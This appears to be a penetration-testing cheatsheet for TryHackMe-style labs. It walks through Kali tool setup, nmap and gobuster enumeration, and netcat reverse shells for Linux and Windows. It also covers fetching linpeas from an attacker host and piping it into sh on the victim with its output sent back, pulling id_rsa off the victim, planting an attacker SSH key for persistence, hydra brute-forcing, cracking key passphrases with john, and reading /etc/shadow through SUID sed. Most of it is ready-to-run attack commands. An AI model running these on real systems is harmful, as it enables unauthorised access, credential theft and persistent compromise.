Exploits

Kali Linux

Install Strings

#Strings
apt-get install binutils

Install searchsploit

sudo apt update && sudo apt -y install exploitdb

Install Terminator

sudo apt-get update

#Terminal
sudo apt-get install terminator

Use Terminator

#Start
terminator

#Split the pane vertically (new terminal to the right)
ctrl+shift+e

#Split the pane horizontally (new terminal below)
ctrl+shift+o

file (check file type)

#Identify a file by its magic bytes, not by its name or extension
file 65461641946198196984910sd4949sdfsdf

Steganography (Hidden Files Inside Images/files)

#Create image with hidden zip: the archive is appended after the JPEG data, so `file` still reports a JPEG
cat image.jpg secret.zip > ostechnix.jpg

#Test the embedded archive (unzip finds the zip headers and only warns about the extra leading bytes)
unzip -t ostechnix.jpg

or

mv ostechnix.jpg ostechnix.zip
unzip -t ostechnix.zip

#Extract it: same command without -t
unzip ostechnix.jpg
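The concatenation trick above, worked through in Python as an added example (not code from the original cheatsheet): build a file that starts with JPEG magic and ends with a zip, see why `file` reports a JPEG, locate the archive by its `PK\x03\x04` local header the way binwalk does, and read the hidden member out of it. The JPEG bytes, the member name and the flag text are constructed placeholders.

```python
import io
import zipfile

# Constructed stand-in for image.jpg: real JPEGs start with FF D8 FF (the magic
# `file` keys on) and end with FF D9; the bytes in between are filler, not a picture.
FAKE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 64 + b"\xff\xd9"

ZIP_LOCAL_HEADER = b"PK\x03\x04"  # signature that opens every zip member


def build_polyglot(image_bytes, secret_name, secret_data):
    """Same result as `cat image.jpg secret.zip > out.jpg`: zip the secret, append it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(secret_name, secret_data)
    return image_bytes + buf.getvalue()


def looks_like_jpeg(data):
    """What `file` sees: the leading magic decides, anything after the image is ignored."""
    return data[:3] == b"\xff\xd8\xff"


def find_zip_offset(data):
    """Locate the appended archive by scanning for the local file header signature,
    which is how binwalk spots it. Returns -1 when there is none."""
    return data.find(ZIP_LOCAL_HEADER)


def carve_secret(data):
    """Read every member of the appended zip. The zip was written starting at its
    own byte 0, so its central-directory offsets are relative to the header we
    found; slicing there gives a well-formed archive (unzip does the equivalent
    and just warns about the extra leading bytes)."""
    offset = find_zip_offset(data)
    if offset < 0:
        return {}
    with zipfile.ZipFile(io.BytesIO(data[offset:])) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


if __name__ == "__main__":
    poly = build_polyglot(FAKE_JPEG, "secret.txt", b"flag{constructed-example}")
    print("file says JPEG:", looks_like_jpeg(poly))
    print("zip starts at byte", find_zip_offset(poly), "of", len(poly))
    print("carved:", carve_secret(poly))
```

`carve_secret` on a plain image returns an empty dict, which is the quick check for "is there anything appended at all" before reaching for binwalk.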

Install/Download linpeas.sh (local privilege-escalation enumeration script)

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

#The project has since moved to https://github.com/carlospolop/PEASS-ng; current linpeas.sh builds are published under that repository's GitHub releases

Install Dirbuster (webserver directory enumeration)

sudo apt-get install dirbuster

Install Gobuster (webserver directory enumeration)

sudo apt-get install gobuster

TryHackMe

start vpn connection

sudo openvpn <vpnfile.ovpn>

#The VPN interface is usually tun0; check with `ip a` and use that address as your attacker IP

1. Initial Poke

Wordlists

Wordlists in kali

ls -lh /usr/share/wordlists/

1.1 Port scan

nmap

nmap -sC -sV -oN /home/nmap/initial <victim ip>


#Switches
-sC: equivalent to --script=default (runs the default NSE script set)
-sV: probe open ports to determine service/version info
-oN <file>: save the scan in normal (human-readable) format to <file>; -oX writes XML, -oG grepable, -oA <base> all formats at once

1.2 web (enum)

gobuster

gobuster -w /opt/Dirbuster-0.12/directory-list-2.3-medium.txt -u http://<victimIP>

#gobuster 3.x takes the mode as a subcommand: gobuster dir -u http://<victimIP> -w <wordlist>
#Kali ships the same wordlist at /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
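Directory brute forcing, as an added Python example rather than gobuster's own code: it stands up a throwaway loopback web server (a constructed stand-in for the target) holding `admin` and `uploads`, then requests each wordlist entry without following redirects and keeps the status codes gobuster reports by default. The 301 on a bare directory name is the tell. Host, wordlist and directory names are assumptions made for the demo.

```python
import functools
import http.client
import http.server
import os
import socketserver
import tempfile
import threading
from urllib.parse import urlsplit

# Status codes gobuster reports by default; everything else (mostly 404) is noise.
INTERESTING = (200, 204, 301, 302, 307, 401, 403)


class QuietHandler(http.server.SimpleHTTPRequestHandler):
    """Serve a directory tree without logging every request to stderr."""

    def log_message(self, format, *args):
        pass


def serve_tree(dir_names):
    """Constructed stand-in for the victim web server: a temporary docroot that
    contains the given directories, served on a random loopback port.
    Returns (server, base_url); call server.shutdown() when done."""
    root = tempfile.mkdtemp()
    for name in dir_names:
        os.makedirs(os.path.join(root, name))
    handler = functools.partial(QuietHandler, directory=root)
    httpd = socketserver.TCPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd, "http://127.0.0.1:%d" % httpd.server_address[1]


def probe(host, port, path):
    """One GET, no redirect following: the raw status code is the signal."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        resp.read()
        return resp.status
    finally:
        conn.close()


def enumerate_dirs(base_url, wordlist, interesting=INTERESTING):
    """Request /<word> for every wordlist entry and keep the hits.
    A 301 on a bare directory name is the usual tell: the server redirects
    to add the trailing slash, which only happens when the directory exists."""
    parts = urlsplit(base_url)
    found = {}
    for word in wordlist:
        status = probe(parts.hostname, parts.port, "/" + word)
        if status in interesting:
            found[word] = status
    return found


if __name__ == "__main__":
    httpd, base = serve_tree(["admin", "uploads"])
    # Constructed mini wordlist standing in for directory-list-2.3-medium.txt
    print(enumerate_dirs(base, ["admin", "backup", "uploads", "login", "images"]))
    httpd.shutdown()
```

Following redirects would turn every 301 into a 200 on the listing page and hide the distinction, which is why `probe` uses `http.client` directly instead of `urllib.request`.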

2. Create reverse connection

2.1 Netcat

netcat listener on attacker box

nc -lvp 4444

netcat from victim (-e attaches the shell to the connection; only nc builds that support -e, such as nc.traditional or ncat, accept it)

#Linux
nc <attacker IP> 4444 -e /bin/bash
#Windows
nc.exe <attacker IP> 4444 -e cmd.exe

--> Cheatsheet for other languages (PHP, Python, Perl, Ruby, Golang, Bash)

3. Gather information about system

linPEAS

#on victim (after uploading the script)
sh linpeas.sh

#Local network: serve the script from the host and pipe it straight into sh on the victim
sudo python -m SimpleHTTPServer 80 #Host (Python 3: sudo python3 -m http.server 80)
curl 10.10.10.10/linpeas.sh | sh #Victim

#Without curl: bash's /dev/tcp pseudo-device opens the TCP connection for you
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.10.10/80 | sh #Victim

#Execute from memory and send output back to the host (needs the web server from above listening on 8000)
nc -lvnp 9002 | tee linpeas.out #Host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim

linEnum

https://github.com/rebootuser/LinEnum

Victim filespace

#world-writable tmpfs, a good place to drop tools; cleared on reboot
/dev/shm

download files between machines

Create a simple webserver on victim (serves the current directory on port 8000)

python -m SimpleHTTPServer
#Python 3: python3 -m http.server

On attacker we download the file

wget http://10.10.0.50:8000/id_rsa

Create RSA keys

#On the victim: move to the target user's home dir
cd /home/username

#Create the folder (sshd expects it to be 700)
mkdir -p .ssh
chmod 700 .ssh

#On the attacker: create a key pair (defaults to ~/.ssh/id_rsa and ~/.ssh/id_rsa.pub)
ssh-keygen

#display keys
cat ~/.ssh/id_rsa
cat ~/.ssh/id_rsa.pub

#Append the attacker's pub-key to the victim user's authorized_keys (id_rsa.pub copied to the victim first).
#Use >> rather than >, or keys already in the file are wiped; sshd ignores the file if others can write it
cat id_rsa.pub >> .ssh/authorized_keys
cat id_rsa.pub >> /home/username/.ssh/authorized_keys
chmod 600 /home/username/.ssh/authorized_keys

Connect SSH

#ssh refuses a private key that is readable by others, so fix the permissions first
chmod 600 id_rsa
ssh -i id_rsa username@ip

4. Brute force

4.1 Hydra

Crack password of known user

hydra -l <username> -P <wordlist> ssh://<victimIP>

hydra -l admin -p password ftp://localhost/
hydra -L default_logins.txt -p test ftp://localhost/
hydra -l admin -P common_passwords.txt ftp://localhost/
hydra -L logins.txt -P passwords.txt ftp://localhost/

4.2 John the Ripper

Crack hashes

john --wordlist=password.lst hashes-3.des.txt

Crack the passphrase of an id_rsa / SSH private key

#Get ssh2john (the repo now lives at https://github.com/openwall/john; Kali ships it as /usr/share/john/ssh2john.py)
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py

#Convert the private key to john's hash format
python ssh2john.py id_rsa > id_rsa.hash

#Brute force the key's passphrase (an unencrypted key has none and needs no cracking)
john --wordlist=wordlist.txt id_rsa.hash

Priv esc

https://gtfobins.github.io/

SearchSploit

#Search the offline Exploit-DB copy (the exploitdb package installed above)
searchsploit <search term>

#msfcli was removed from Metasploit Framework in 2015; use msfconsole (or msfconsole -x "<commands>") instead
msfconsole

METERPRETER


sed

#If sed is SUID (an s in the mode bits) or allowed via sudo, it reads files as root
ls -l /bin/sed

#Read file (an empty script prints every line unchanged)
sed '' /etc/shadow
sed '' .flag

check content of file

#Scan a file for embedded files/firmware by signature; add -e to also extract what it finds
binwalk 'filename.bin'

Contributors

iw3r